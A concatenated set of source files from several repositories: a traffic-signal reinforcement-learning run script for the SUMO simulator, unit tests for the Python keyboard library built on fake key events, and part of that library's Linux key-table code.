plt.savefig(os.path.join(self.path,self.file_name,
'node_info', '{}_{}l_{}n.png'.format(info_type, layer, node)), dpi=100)
def time_write(self):
for l, num_node in enumerate(self.b_size_list):
for n in range(num_node):
self.nodes_integrated['avg_cum_{}l_{}n'.format(l, n)] = torch.cumsum(torch.tensor(
self.nodes_integrated['avg_{}l_{}n'.format(l, n)]), dim=0)
self.nodes_integrated['var_cum_{}l_{}n'.format(l, n)] = torch.cumsum(torch.tensor(
self.nodes_integrated['var_{}l_{}n'.format(l, n)]), dim=0)
self.nodes_integrated['norm_cum_{}l_{}n'.format(l, n)] = torch.cumsum(torch.tensor(
self.nodes_integrated['norm_{}l_{}n'.format(l, n)]), dim=0)
for info_type in self.info_type_list:
self.time_write_(l, n, info_type)
# integrated value plot
def time_integrated_write_(self, num_node, layer, info_type):
plt.clf()
legend_list = list()
for n in range(num_node):
plt.plot(
self.time_list, self.nodes_integrated['{}_{}l_{}n'.format(info_type, layer, n)])
legend_list.append(['{}l_{}n'.format(layer, n)])
plt.xlabel('iter')
plt.ylabel('avg of grad in node')
plt.legend(legend_list)
plt.savefig(os.path.join(self.path,self.file_name,
'node_integrated_info', '{}_{}l_{}n.png'.format(layer, n)), dpi=150)
del legend_list
def time_integrated_write(self):
for l, num_node in enumerate(self.b_size_list):
for info_type in self.info_type_list:
self.time_integrated_write_(num_node, l, info_type)
``` |
{
"source": "3neutronstar/traffic-optimization_RL",
"score": 2
} |
#### File: traffic-optimization_RL/Discrete/run.py
```python
import argparse
import json,os, sys
import time
import torch
import torch.optim as optim
import traci
import random
import numpy as np
import traci.constants as tc
from sumolib import checkBinary
from utils import interest_list
from configs import EXP_CONFIGS
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="choose the mode",
epilog="python run.py mode")
# required input parameters
parser.add_argument(
'mode', type=str,
help='train or test, simulate, "train_old" is the old version to train')
parser.add_argument(
'--network', type=str, default='grid',
help='choose network in Env')
# optional input parameters
parser.add_argument(
'--disp', type=str, default='no',
help='show the process while in training')
parser.add_argument(
'--replay_name', type=str, default=None,
help='activate only in test mode and write file_name to load weights.')
parser.add_argument(
'--algorithm', type=str, default='dqn',
help='choose algorithm dqn, reinforce, a2c, ppo.')
parser.add_argument(
'--model', type=str, default='base',
help='choose model base and FRAP.')
parser.add_argument(
'--gpu', type=bool, default=False,
help='choose model base and FRAP.')
parser.add_argument(
'--phase', type=str, default=8,
help='choose phase 4 or 8 (Currently frap is available on 8')
return parser.parse_known_args(args)[0]
'''
New version of training file
'''
def train(flags, time_data, configs, sumoConfig):
# check gui option
if flags.disp == 'yes':
sumoBinary = checkBinary('sumo-gui')
else:
sumoBinary = checkBinary('sumo')
sumoCmd = [sumoBinary, "-c", sumoConfig, '--start']
# configs setting
configs['algorithm'] = flags.algorithm.lower()
print("training algorithm: ", configs['algorithm'])
configs['num_phase']=int(flags.phase)
if flags.algorithm.lower() == 'super_dqn': # action space와 size 설정
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'base':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'frap':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 16
configs['model'] = 'frap'
if flags.algorithm.lower() == 'dqn':
from train import dqn_train
dqn_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'super_dqn':
from train import super_dqn_train
super_dqn_train(configs, time_data, sumoCmd)
'''
Old version of training file
'''
def train_old(flags, time_data, configs, sumoConfig):
# check gui option
if flags.disp == 'yes':
sumoBinary = checkBinary('sumo-gui')
else:
sumoBinary = checkBinary('sumo')
sumoCmd = [sumoBinary, "-c", sumoConfig, '--start']
# configs setting
configs['algorithm'] = flags.algorithm.lower()
print("training algorithm: ", configs['algorithm'])
configs['num_phase']=int(flags.phase)
if flags.algorithm.lower() == 'super_dqn': # action space와 size 설정
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'base':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'frap':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 16
configs['model'] = 'frap'
if flags.algorithm.lower() == 'dqn':
from train_old import dqn_train
dqn_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'reinforce':
from train_old import REINFORCE_train
REINFORCE_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'a2c':
from train_old import a2c_train
a2c_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'ppo':
from train_old import ppo_train
ppo_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'super_dqn':
from train_old import super_dqn_train
super_dqn_train(configs, time_data, sumoCmd)
def test(flags, configs, sumoConfig):
from Env.Env import TL3x3Env
from Agent.dqn import Trainer
from Env.MultiEnv import GridEnv
from utils import save_params, load_params, update_tensorboard
# init test setting
sumoBinary = checkBinary('sumo-gui')
sumoCmd = [sumoBinary, "-c", sumoConfig]
# setting the rl list
tl_rl_list = configs['tl_rl_list']
MAX_STEPS = configs['max_steps']
reward = 0
traci.start(sumoCmd)
agent = Trainer(configs)
# setting the replay
if flags.replay_name is not None:
agent.load_weights(flags.replay_name)
configs = load_params(configs, flags.replay_name)
env = TL3x3Env( configs)
step = 0
# state initialization
state = env.get_state()
# agent setting
total_reward = 0
arrived_vehicles = 0
action_distribution = tuple()
with torch.no_grad():
while step < MAX_STEPS:
action = agent.get_action(state)
action_distribution += action
env.step(action) # action 적용함수
for _ in range(20): # 10초마다 행동 갱신
env.collect_state()
traci.simulationStep()
step += 1
traci.trafficlight.setRedYellowGreenState(tl_rl_list[0], 'y'*28)
for _ in range(5):
traci.simulationStep()
env.collect_state()
step += 1
reward = env.get_reward()
next_state = env.get_state()
# agent.save_replay(state, action, reward, next_state)
state = next_state
total_reward += reward
step += 1
if step == MAX_STEPS:
done = True
# agent.update(done) # no update in
# loss += agent.get_loss() # 총 loss
arrived_vehicles += traci.simulation.getArrivedNumber() # throughput
traci.simulationStep()
# if step % 200 == 0:
agent.target_update()
traci.close()
print('======== return: {} arrived number:{}'.format(
total_reward, arrived_vehicles))
def simulate(flags, configs, sumoConfig):
sumoBinary = checkBinary('sumo')
sumoCmd = [sumoBinary, "-c", sumoConfig]
MAX_STEPS = configs['max_steps']
traci.start(sumoCmd)
traci.simulation.subscribe([tc.VAR_ARRIVED_VEHICLES_NUMBER])
avg_waiting_time = 0
avg_velocity = 0
step = 0
# agent setting
arrived_vehicles = 0
avg_velocity = 0
while step < MAX_STEPS:
traci.simulationStep()
step += 1
for _, edge in enumerate(interest_list):
avg_waiting_time += traci.edge.getWaitingTime(edge['inflow'])
# vehicle_list = traci.vehicle.getIDList()
# for i, vehicle in enumerate(vehicle_list):
# speed = traci.vehicle.getSpeed(vehicle)
# avg_velocity = float((i)*avg_velocity+speed) / \
# float(i+1) # incremental avg
arrived_vehicles += traci.simulation.getAllSubscriptionResults()[
''][0x79] # throughput
traci.close()
print('======== arrived number:{} avg waiting time:{},avg velocity:{}'.format(
arrived_vehicles, avg_waiting_time/MAX_STEPS, avg_velocity))
def main(args):
random_seed=20000
random.seed(random_seed)
torch.manual_seed(random_seed)
np.random.seed(random_seed)
flags = parse_args(args)
configs=EXP_CONFIGS
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda and flags.gpu == True else "cpu")
#device = torch.device('cpu')
print("Using device: {}".format(device))
configs['device'] = str(device)
configs['current_path'] = os.path.dirname(os.path.abspath(__file__))
configs['mode'] = flags.mode.lower()
# init train setting
time_data = time.strftime('%m-%d_%H-%M-%S', time.localtime(time.time()))
configs['time_data'] = str(time_data)
# check the network
if flags.network.lower() == 'grid':
from grid import GridNetwork # network바꿀때 이걸로 바꾸세요(수정 예정)
configs['grid_num'] = 3
if flags.algorithm.lower()=='super_dqn':
configs['grid_num']=3
configs['file_name'] = '{}x{}grid'.format(
configs['grid_num'], configs['grid_num'])
configs['grid_side'] = 'in' # out mode도 만들 예정 in모드시에 내부 tl만 컨트롤
network = GridNetwork(configs, grid_num=configs['grid_num'])
network.generate_cfg(True, configs['mode'])
# check the mode
if configs['mode'] == 'train':
configs['mode'] = 'train'
sumoConfig = os.path.join(
configs['current_path'], 'training_data', time_data, 'net_data', configs['file_name']+'_train.sumocfg')
train(flags, time_data, configs, sumoConfig)
elif configs['mode'] == 'train_old':
configs['mode'] = 'train'
sumoConfig = os.path.join(
configs['current_path'], 'training_data', time_data, 'net_data', configs['file_name']+'_train.sumocfg')
train_old(flags, time_data, configs, sumoConfig)
elif configs['mode'] == 'test':
configs['mode'] = 'test'
sumoConfig = os.path.join(
configs['current_path'], 'Net_data', configs['file_name']+'_test.sumocfg')
test(flags, configs, sumoConfig)
else: # simulate
configs['mode'] = 'simulate'
sumoConfig = os.path.join(
configs['current_path'], 'Net_data', configs['file_name']+'_simulate.sumocfg')
simulate(flags, configs, sumoConfig)
# check the environment
if 'SUMO_HOME' in os.environ:
tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
sys.path.append(tools)
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
if __name__ == '__main__':
main(sys.argv[1:])
``` |
{
"source": "3ngthrust/Symbolic-Math-Hotkeys",
"score": 3
} |
#### File: Symbolic-Math-Hotkeys/keyboard/_keyboard_tests.py
```python
import time
import unittest
import string
import keyboard
from ._keyboard_event import KeyboardEvent, canonical_names, KEY_DOWN, KEY_UP
from ._suppress import KeyTable
# Fake events with fake scan codes for a totally deterministic test.
all_names = set(canonical_names.values()) | set(string.ascii_lowercase) | set(string.ascii_uppercase) | {'shift'}
scan_codes_by_name = {name: i for i, name in enumerate(sorted(all_names))}
scan_codes_by_name.update({key: scan_codes_by_name[value]
for key, value in canonical_names.items()})
scan_codes_by_name['shift2'] = scan_codes_by_name['shift']
class FakeEvent(KeyboardEvent):
def __init__(self, event_type, name, scan_code=None):
KeyboardEvent.__init__(self, event_type, scan_code or scan_codes_by_name[name], name)
class FakeOsKeyboard(object):
def __init__(self):
self.listening = False
self.append = None
self.queue = None
self.allowed_keys = KeyTable(keyboard.press, keyboard.release)
self.init = lambda: None
self.is_allowed = lambda *args: True
def listen(self, queue, is_allowed):
self.listening = True
self.queue = queue
self.is_allowed = is_allowed
def get_key_name(self, scan_code):
return next(name for name, i in sorted(scan_codes_by_name.items()) if i == scan_code and name not in canonical_names)
def press(self, key):
if not isinstance(key, str):
key = self.get_key_name(key)
self.append((KEY_DOWN, key))
def release(self, key):
if not isinstance(key, str):
key = self.get_key_name(key)
self.append((KEY_UP, key))
def map_char(self, char):
try:
return scan_codes_by_name[char.lower()], ('shift',) if char.isupper() else ()
except KeyError as e:
raise ValueError(e)
def type_unicode(self, letter):
event = FakeEvent('unicode', 'a')
event.name = letter
self.append(event)
class TestKeyboard(unittest.TestCase):
# Without this attribute Python2 tests fail for some unknown reason.
__name__ = 'what'
@staticmethod
def setUpClass():
keyboard._os_keyboard = FakeOsKeyboard()
keyboard._listener.start_if_necessary()
assert keyboard._os_keyboard.listening
assert keyboard._listener.listening
def setUp(self):
self.events = []
keyboard._pressed_events.clear()
keyboard._os_keyboard.append = self.events.append
def tearDown(self):
keyboard.unhook_all()
# Make sure there's no spill over between tests.
self.wait_for_events_queue()
def press(self, name, scan_code=None):
is_allowed = keyboard._os_keyboard.is_allowed(name, False)
keyboard._os_keyboard.queue.put(FakeEvent(KEY_DOWN, name, scan_code))
self.wait_for_events_queue()
return is_allowed
def release(self, name, scan_code=None):
is_allowed = keyboard._os_keyboard.is_allowed(name, True)
keyboard._os_keyboard.queue.put(FakeEvent(KEY_UP, name, scan_code))
self.wait_for_events_queue()
return is_allowed
def click(self, name, scan_code=None):
return self.press(name, scan_code) and self.release(name, scan_code)
def flush_events(self):
self.wait_for_events_queue()
events = list(self.events)
# Ugly, but requried to work in Python2. Python3 has list.clear
del self.events[:]
return events
def wait_for_events_queue(self):
keyboard._listener.queue.join()
def test_matches(self):
self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift'), scan_codes_by_name['shift']))
self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift'), 'shift'))
self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift'), 'shift2'))
self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift2'), 'shift'))
def test_listener(self):
empty_event = FakeEvent(KEY_DOWN, 'space')
empty_event.scan_code = None
keyboard._os_keyboard.queue.put(empty_event)
self.assertEqual(self.flush_events(), [])
def test_canonicalize(self):
space_scan_code = [[scan_codes_by_name['space']]]
space_name = [['space']]
self.assertEqual(keyboard.canonicalize(space_scan_code), space_scan_code)
self.assertEqual(keyboard.canonicalize(space_name), space_name)
self.assertEqual(keyboard.canonicalize(scan_codes_by_name['space']), space_scan_code)
self.assertEqual(keyboard.canonicalize('space'), space_name)
self.assertEqual(keyboard.canonicalize(' '), space_name)
self.assertEqual(keyboard.canonicalize('spacebar'), space_name)
self.assertEqual(keyboard.canonicalize('Space'), space_name)
self.assertEqual(keyboard.canonicalize('SPACE'), space_name)
with self.assertRaises(ValueError):
keyboard.canonicalize(['space'])
with self.assertRaises(ValueError):
keyboard.canonicalize(keyboard)
self.assertEqual(keyboard.canonicalize('_'), [['_']])
self.assertEqual(keyboard.canonicalize('space_bar'), space_name)
def test_is_pressed(self):
self.assertFalse(keyboard.is_pressed('enter'))
self.assertFalse(keyboard.is_pressed(scan_codes_by_name['enter']))
self.press('enter')
self.assertTrue(keyboard.is_pressed('enter'))
self.assertTrue(keyboard.is_pressed(scan_codes_by_name['enter']))
self.release('enter')
self.release('enter')
self.assertFalse(keyboard.is_pressed('enter'))
self.click('enter')
self.assertFalse(keyboard.is_pressed('enter'))
self.press('enter')
self.assertFalse(keyboard.is_pressed('ctrl+enter'))
self.press('ctrl')
self.assertTrue(keyboard.is_pressed('ctrl+enter'))
self.press('space')
self.assertTrue(keyboard.is_pressed('space'))
with self.assertRaises(ValueError):
self.assertFalse(keyboard.is_pressed('invalid key'))
with self.assertRaises(ValueError):
keyboard.is_pressed('space, space')
def test_is_pressed_duplicated_key(self):
self.assertFalse(keyboard.is_pressed(100))
self.assertFalse(keyboard.is_pressed(101))
self.assertFalse(keyboard.is_pressed('ctrl'))
self.press('ctrl', 100)
self.assertTrue(keyboard.is_pressed(100))
self.assertFalse(keyboard.is_pressed(101))
self.assertTrue(keyboard.is_pressed('ctrl'))
self.release('ctrl', 100)
self.press('ctrl', 101)
self.assertFalse(keyboard.is_pressed(100))
self.assertTrue(keyboard.is_pressed(101))
self.assertTrue(keyboard.is_pressed('ctrl'))
self.release('ctrl', 101)
def triggers(self, combination, keys):
self.triggered = False
def on_triggered():
self.triggered = True
keyboard.add_hotkey(combination, on_triggered)
for group in keys:
for key in group:
self.assertFalse(self.triggered)
self.press(key)
for key in reversed(group):
self.release(key)
keyboard.remove_hotkey(combination)
self.wait_for_events_queue()
return self.triggered
def test_hook(self):
self.i = 0
def count(e):
self.assertEqual(e.name, 'a')
self.i += 1
keyboard.hook(count)
self.click('a')
self.assertEqual(self.i, 2)
keyboard.hook(count)
self.click('a')
self.assertEqual(self.i, 6)
keyboard.unhook(count)
self.click('a')
self.assertEqual(self.i, 8)
keyboard.unhook(count)
self.click('a')
self.assertEqual(self.i, 8)
def test_hook_key(self):
self.i = 0
def count():
self.i += 1
keyboard.hook_key('a', keyup_callback=count)
self.press('a')
self.assertEqual(self.i, 0)
self.release('a')
self.click('b')
self.assertEqual(self.i, 1)
keyboard.hook_key('b', keydown_callback=count)
self.press('b')
self.assertEqual(self.i, 2)
keyboard.unhook_key('a')
keyboard.unhook_key('b')
self.click('a')
self.assertEqual(self.i, 2)
def test_register_hotkey(self):
self.assertFalse(self.triggers('a', [['b']]))
self.assertTrue(self.triggers('a', [['a']]))
self.assertTrue(self.triggers('a, b', [['a'], ['b']]))
self.assertFalse(self.triggers('b, a', [['a'], ['b']]))
self.assertTrue(self.triggers('a+b', [['a', 'b']]))
self.assertTrue(self.triggers('ctrl+a, b', [['ctrl', 'a'], ['b']]))
self.assertFalse(self.triggers('ctrl+a, b', [['ctrl'], ['a'], ['b']]))
self.assertTrue(self.triggers('ctrl+a, b', [['a', 'ctrl'], ['b']]))
self.assertTrue(self.triggers('ctrl+a, b, a', [['ctrl', 'a'], ['b'], ['ctrl', 'a'], ['b'], ['a']]))
def test_remove_hotkey(self):
keyboard.press('a')
keyboard.add_hotkey('a', self.fail)
keyboard.clear_all_hotkeys()
keyboard.press('a')
keyboard.add_hotkey('a', self.fail)
keyboard.clear_all_hotkeys()
keyboard.press('a')
keyboard.clear_all_hotkeys()
keyboard.add_hotkey('a', self.fail)
with self.assertRaises(ValueError):
keyboard.remove_hotkey('b')
keyboard.remove_hotkey('a')
def test_write(self):
keyboard.write('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a')])
keyboard.write('ab')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
keyboard.write('Ab')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift'), (KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_UP, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
keyboard.write('\n')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'enter'), (KEY_UP, 'enter')])
def test_send(self):
keyboard.send('shift', True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
keyboard.send('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a')])
keyboard.send('a, b')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
keyboard.send('shift+a, b')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift'), (KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_UP, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
self.press('a')
keyboard.write('a', restore_state_after=False, delay=0.001)
# TODO: two KEY_UP 'a' because the tests are not clearing the pressed
# keys correctly, it's not a bug in the keyboard module itself.
self.assertEqual(self.flush_events(), [(KEY_UP, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'a'), (KEY_UP, 'a')])
shift_scan_code = scan_codes_by_name['shift']
keyboard.send(shift_scan_code, True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
keyboard.send([[shift_scan_code]], True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
keyboard.send([['shift']], True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
def test_type_unicode(self):
keyboard.write(u'û')
events = self.flush_events()
self.assertEqual(len(events), 1)
self.assertEqual(events[0].event_type, 'unicode')
self.assertEqual(events[0].name, u'û')
def test_press_release(self):
keyboard.press('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a')])
keyboard.release('a')
self.assertEqual(self.flush_events(), [(KEY_UP, 'a')])
keyboard.press('shift+a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift'), (KEY_DOWN, 'a')])
keyboard.release('shift+a')
self.assertEqual(self.flush_events(), [(KEY_UP, 'a'), (KEY_UP, 'shift')])
keyboard.press_and_release('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a')])
def test_wait(self):
# If this fails it blocks. Unfortunately, but I see no other way of testing.
from threading import Thread, Lock
lock = Lock()
lock.acquire()
def t():
keyboard.wait('a')
lock.release()
Thread(target=t).start()
self.click('a')
lock.acquire()
def test_record_play(self):
from threading import Thread, Lock
lock = Lock()
lock.acquire()
self.recorded = None
def t():
self.recorded = keyboard.record('esc')
lock.release()
Thread(target=t).start()
self.click('a')
self.press('shift')
self.press('b')
self.release('b')
self.release('shift')
self.press('esc')
lock.acquire()
expected = [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b'), (KEY_UP, 'shift'), (KEY_DOWN, 'esc')]
for event_recorded, expected_pair in zip(self.recorded, expected):
expected_type, expected_name = expected_pair
self.assertEqual(event_recorded.event_type, expected_type)
self.assertEqual(event_recorded.name, expected_name)
keyboard._pressed_events.clear()
keyboard.play(self.recorded, speed_factor=0)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b'), (KEY_UP, 'shift'), (KEY_DOWN, 'esc')])
keyboard.play(self.recorded, speed_factor=100)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b'), (KEY_UP, 'shift'), (KEY_DOWN, 'esc')])
# Should be ignored and not throw an error.
keyboard.play([FakeEvent('fake type', 'a')])
def test_word_listener_normal(self):
keyboard.add_word_listener('bird', self.fail)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.click('s')
self.click('space')
with self.assertRaises(ValueError):
keyboard.add_word_listener('bird', self.fail)
keyboard.remove_word_listener('bird')
self.triggered = False
def on_triggered():
self.triggered = True
keyboard.add_word_listener('bird', on_triggered)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
self.assertTrue(self.triggered)
keyboard.remove_word_listener('bird')
self.triggered = False
def on_triggered():
self.triggered = True
# Word listener should be case sensitive.
keyboard.add_word_listener('Bird', on_triggered)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
self.assertFalse(self.triggered)
self.press('shift')
self.click('b')
self.release('shift')
self.click('i')
self.click('r')
self.click('d')
self.click('space')
self.assertTrue(self.triggered)
keyboard.remove_word_listener('Bird')
def test_word_listener_edge_cases(self):
self.triggered = False
def on_triggered():
self.triggered = True
handler = keyboard.add_word_listener('bird', on_triggered, triggers=['enter'])
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.click('space')
# We overwrote the triggers to remove space. Should not trigger.
self.assertFalse(self.triggered)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('enter')
self.assertTrue(self.triggered)
with self.assertRaises(ValueError):
# Must pass handler returned by function, not passed callback.
keyboard.remove_word_listener(on_triggered)
with self.assertRaises(ValueError):
keyboard.remove_word_listener('birb')
keyboard.remove_word_listener(handler)
self.triggered = False
# Timeout of 0 should mean "no timeout".
keyboard.add_word_listener('bird', on_triggered, timeout=0)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
self.assertTrue(self.triggered)
keyboard.remove_word_listener('bird')
self.triggered = False
keyboard.add_word_listener('bird', on_triggered, timeout=0.01)
self.click('b')
self.click('i')
self.click('r')
time.sleep(0.03)
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
# Should have timed out.
self.assertFalse(self.triggered)
keyboard.remove_word_listener('bird')
def test_abbreviation(self):
keyboard.add_abbreviation('tm', 'a')
self.press('shift')
self.click('t')
self.release('shift')
self.click('space')
self.assertEqual(self.flush_events(), []) # abbreviations should be case sensitive
self.click('t')
self.click('m')
self.click('space')
self.assertEqual(self.flush_events(), [
(KEY_UP, 'space'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'a'),
(KEY_UP, 'a')])
keyboard.add_abbreviation('TM', 'A')
self.press('shift')
self.click('t')
self.release('shift')
self.click('m')
self.click('space')
self.assertEqual(self.flush_events(), [])
self.press('shift')
self.click('t')
self.click('m')
self.release('shift')
self.click('space')
self.assertEqual(self.flush_events(), [
(KEY_UP, 'space'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'shift'),
(KEY_DOWN, 'a'),
(KEY_UP, 'a'),
(KEY_UP, 'shift'),])
def test_stash_restore_state(self):
self.press('a')
self.press('b')
state = keyboard.stash_state()
self.assertEqual(sorted(self.flush_events()), [(KEY_UP, 'a'), (KEY_UP, 'b')])
keyboard._pressed_events.clear()
assert len(state) == 2
self.press('c')
keyboard.restore_state(state)
self.assertEqual(sorted(self.flush_events()), [(KEY_DOWN, 'a'), (KEY_DOWN, 'b'), (KEY_UP, 'c')])
def test_get_typed_strings(self):
keyboard.hook(self.events.append)
self.click('b')
self.click('i')
self.press('shift')
self.click('r')
self.click('caps lock')
self.click('d')
self.click('caps lock')
self.release('shift')
self.click(' ')
self.click('backspace')
self.click('.')
self.click('enter')
self.click('n')
self.click('e')
self.click('w')
self.assertEqual(list(keyboard.get_typed_strings(self.events)), ['biRd.', 'new'])
def test_on_press(self):
keyboard.on_press(lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_DOWN))
self.release('a')
self.press('a')
def test_on_release(self):
keyboard.on_release(lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_UP))
self.press('a')
self.release('a')
def test_call_later(self):
self.triggered = False
def trigger(): self.triggered = True
keyboard.call_later(trigger, delay=0.1)
self.assertFalse(self.triggered)
time.sleep(0.2)
self.assertTrue(self.triggered)
def test_suppression(self):
def dummy():
pass
keyboard.add_hotkey('a+b+c', dummy, suppress=True)
keyboard.add_hotkey('a+g+h', dummy, suppress=True, timeout=0.01)
for key in ['a', 'b', 'c']:
assert not self.press(key)
for key in ['a', 'b', 'c']:
assert not self.release(key)
assert self.click('d')
for key in ['a', 'b']:
assert not self.press(key)
for key in ['a', 'b']:
assert not self.release(key)
assert self.click('c')
for key in ['a', 'g']:
assert not self.press(key)
for key in ['a', 'g']:
assert not self.release(key)
time.sleep(0.03)
assert self.click('h')
keyboard.remove_hotkey('a+g+h')
keyboard.remove_hotkey('a+b+c')
assert self.click('a')
if __name__ == '__main__':
unittest.main()
```
#### File: Symbolic-Math-Hotkeys/keyboard/_nixkeyboard.py
```python
import struct
import traceback
from time import time as now
from collections import namedtuple
from ._keyboard_event import KeyboardEvent, KEY_DOWN, KEY_UP, normalize_name
from ._nixcommon import EV_KEY, aggregate_devices, ensure_root
from ._suppress import KeyTable
# TODO: start by reading current keyboard state, as to not missing any already pressed keys.
# See: http://stackoverflow.com/questions/3649874/how-to-get-keyboard-state-in-linux
def cleanup_key(name):
""" Formats a dumpkeys format to our standard. """
name = name.lstrip('+')
is_keypad = name.startswith('KP_')
for mod in ('Meta_', 'Control_', 'dead_', 'KP_'):
if name.startswith(mod):
name = name[len(mod):]
# Dumpkeys is weird like that.
if name == 'Remove':
name = 'Delete'
elif name == 'Delete':
name = 'Backspace'
return normalize_name(name), is_keypad
def cleanup_modifier(modifier):
expected = ('alt', 'ctrl', 'shift', 'alt gr')
modifier = normalize_name(modifier)
if modifier in expected:
return modifier
if modifier[:-1] in expected:
return modifier[:-1]
raise ValueError('Unknown modifier {}'.format(modifier))
"""
Use `dumpkeys --keys-only` to list all scan codes and their names. We
then parse the output and built a table. For each scan code and modifiers we
have a list of names and vice-versa.
"""
from subprocess import check_output
import re
to_name = {}
from_name = {}
keypad_scan_codes = set()
def register_key(key_and_modifiers, name):
to_name[key_and_modifiers] = name
from_name[name] = key_and_modifiers
def build_tables():
if to_name and from_name: return
ensure_root()
keycode_template = r'^(.*?)keycode\s+(\d+)\s+=(.*?)$'
dump = check_output(['dumpkeys', '--keys-only'], universal_newlines=True)
for str_modifiers, str_scan_code, str_names in re.findall(keycode_template, dump, re.MULTILINE):
if not str_names: continue
modifiers = tuple(sorted(set(cleanup_modifier(m) for m in str_modifiers.strip().split())))
scan_code = int(str_scan_code)
name, is_keypad = cleanup_key(str_names.strip().split()[0])
to_name[(scan_code, modifiers)] = name
if is_keypad:
keypad_scan_codes.add(scan_code)
from_name['keypad ' + name] = (scan_code, ())
if name not in from_name or len(modifiers) < len(from_name[name][1]):
from_name[name] = (scan_code, modifiers)
# Assume Shift uppercases keys that are single characters.
# Hackish, but a good heuristic so far.
for name, (scan_code, modifiers) in list(from_name.items()):
upper = name.upper()
if len(name) == 1 and upper not in from_name:
register_key((scan_code, modifiers + ('shift',)), upper)
# dumpkeys consistently misreports the Windows key, sometimes
# skipping it completely or reporting as 'alt. 125 = left win,
# 126 = right win.
if (125, ()) not in to_name or to_name[(125, ())] == 'alt':
register_key((125, ()), 'windows')
if (126, ()) not in to_name or to_name[(126, ())] == 'alt':
register_key((126, ()), 'windows')
# The menu key is usually skipped altogether, so we also add it manually.
if (127, ()) not in to_name:
register_key((127, ()), 'menu')
synonyms_template = r'^(\S+)\s+for (.+)$'
dump = check_output(['dumpkeys', '--long-info'], universal_newlines=True)
for synonym_str, original_str in re.findall(synonyms_template, dump, re.MULTILINE):
synonym, _ = cleanup_key(synonym_str)
original, _ = cleanup_key(original_str)
try:
from_name[synonym] = from_name[original]
except KeyError:
# Dumpkeys reported a synonym to an unknown key.
pass
device = None
def build_device():
global device
if device: return
ensure_root()
device = aggregate_devices('kbd')
def init():
build_device()
build_tables()
pressed_modifiers = set()
